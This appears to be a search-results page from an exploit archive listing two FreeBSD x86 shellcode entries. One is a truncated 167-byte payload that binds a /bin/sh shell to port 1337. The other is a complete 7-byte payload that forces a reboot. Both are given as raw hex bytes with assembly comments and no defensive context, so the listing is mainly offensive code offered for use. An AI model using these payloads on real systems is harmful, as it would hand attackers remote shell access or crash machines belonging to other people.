2 matches found
freebsd/x86 portbind shellcode 167 bytes
No description provided by source. /- Copyright c 2009, Sofian Brabez [email protected] freebsd-x86-portbind.c - FreeBSD x86 portbind a shell /bin/sh on 1337 \x05\x39 167 bytes / const char shellcode = "\x6a\x00" // push $0x0 "\x6a\x01" // push $0x1 "\x6a\x02" // push $0x2 "\x50" // push %eax "\x6a\x6...
freebsd/x86 - rebootRB_AUTOBOOT Shellcode 7 bytes
freebsd/x86 rebootRBAUTOBOOT Shellcode 7 bytes. Shellcode exploit for freebsdx86 platform / FreeBSDx86-reboot-7b.c Shellcode, rebootRBAUTOBOOT, 7 bytes by IZ / char shellcode = "\x31\xc0" / xor %eax,%eax / "\x50" / push %eax / "\xb0\x37" / mov $0x37,%al / "\xcd\x80"; / int $0x80 / void main int...